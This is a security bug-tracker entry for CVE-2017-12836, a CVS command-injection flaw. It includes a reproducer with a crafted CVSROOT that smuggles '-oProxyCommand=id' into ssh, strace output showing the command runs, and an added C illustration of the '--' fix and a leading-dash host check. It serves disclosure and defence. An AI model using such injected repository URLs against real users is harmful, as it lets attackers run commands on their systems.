Bug 1480800 (CVE-2017-12836)
| Field | Value |
|---|---|
| Summary | CVE-2017-12836 cvs: Command injection via malicious ssh URLs |
| Product | [Other] Security Response |
| Reporter | Adam Mariš <amaris> |
| Component | vulnerability |
| Assignee | Red Hat Product Security <security-response-team> |
| Status | CLOSED WONTFIX |
| Severity | medium |
| Priority | medium |
| Version | unspecified |
| CC | ppisar |
| Keywords | Security |
| Hardware | All |
| OS | Linux |
| Doc Type | If docs needed, set a value |
| Last Closed | 2017-08-22 13:35:08 UTC |
| Bug Depends On | 1480801 |
| Bug Blocks | 1480802, 1485460 |
Description
Adam Mariš
2017-08-11 22:22:01 UTC
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]

Reproducer:

```
$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++
```

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.

Created attachment 1313002 [details]: Fix ported to 1.11.23
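To show what the "--" guard from the Debian fix actually changes, here is an added example (not CVS's own code, not the attached patch) that builds the argument vector a CVS-like client would hand to $CVS_RSH, both in the vulnerable layout and with "--" inserted before the hostname, plus a pre-check that flags a hostname starting with '-'. The helper names (`split_cvsroot`, `host_looks_like_option`, `build_rsh_argv`) are assumptions for this illustration, `split_cvsroot` only understands the bare `host:/path` CVSROOT form used in the reproducer, and nothing is executed: the vector is only built and printed.

```c
#include <stdio.h>
#include <string.h>

/* Upper bound on the argv slots we fill: rsh, "--", host, command, NULL. */
#define RSH_MAX_ARGS 8

/* Split a bare "host:/path" CVSROOT (the form in this bug's reproducer) at
 * the first ':'. Copies the host into hostbuf and returns the path, or NULL
 * when there is no ':' or the host does not fit. Assumed helper, not CVS code. */
const char *split_cvsroot(const char *root, char *hostbuf, size_t hostlen)
{
    const char *colon = strchr(root, ':');
    size_t n;
    if (colon == NULL)
        return NULL;
    n = (size_t)(colon - root);
    if (n >= hostlen)
        return NULL;
    memcpy(hostbuf, root, n);
    hostbuf[n] = '\0';
    return colon + 1;
}

/* Returns 1 when the host would be consumed by ssh's option parser because it
 * begins with '-'. That is the precondition for this bug; a client that wants
 * to refuse such a CVSROOT outright can use this check before spawning ssh. */
int host_looks_like_option(const char *host)
{
    return host != NULL && host[0] == '-';
}

/* Build the argument vector handed to $CVS_RSH.
 * hardened == 0 mirrors the vulnerable layout:  rsh host command
 * hardened != 0 inserts "--" before the host:   rsh -- host command
 * With "--" present, getopt-based ssh stops option parsing, so a host such as
 * "-oProxyCommand=id;localhost" is treated as a hostname, not as -o.
 * Returns the argument count (excluding the terminating NULL), or -1. */
int build_rsh_argv(const char *rsh, const char *host, const char *command,
                   int hardened, const char *argv[RSH_MAX_ARGS])
{
    int n = 0;
    if (rsh == NULL || host == NULL || command == NULL)
        return -1;
    argv[n++] = rsh;
    if (hardened)
        argv[n++] = "--";          /* end of options for ssh */
    argv[n++] = host;
    argv[n++] = command;
    argv[n] = NULL;
    return n;
}

int main(void)
{
    /* Constructed CVSROOT in the shape of the reproducer above. */
    const char *root = "-oProxyCommand=id;localhost:/bar";
    const char *argv[RSH_MAX_ARGS];
    char host[64];
    const char *path = split_cvsroot(root, host, sizeof host);
    int i, n, hardened;

    if (path == NULL) {
        fprintf(stderr, "could not parse CVSROOT\n");
        return 1;
    }
    printf("host=[%s] path=[%s] looks like an option: %s\n", host, path,
           host_looks_like_option(host) ? "yes" : "no");

    for (hardened = 0; hardened <= 1; hardened++) {
        n = build_rsh_argv("/usr/bin/ssh", host, "cvs server", hardened, argv);
        printf("%s argv:", hardened ? "hardened  " : "vulnerable");
        for (i = 0; i < n; i++)
            printf(" [%s]", argv[i]);
        printf("\n");
    }
    return 0;
}
```

In the vulnerable vector argv[1] is the attacker-controlled host, which ssh parses as `-oProxyCommand=...`; in the hardened vector argv[1] is `--` and the same string lands in the hostname slot, where ssh will merely fail to resolve it. Refusing hosts that start with '-' (the pre-check) is the belt-and-braces companion to the separator.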
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.

Statement: Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.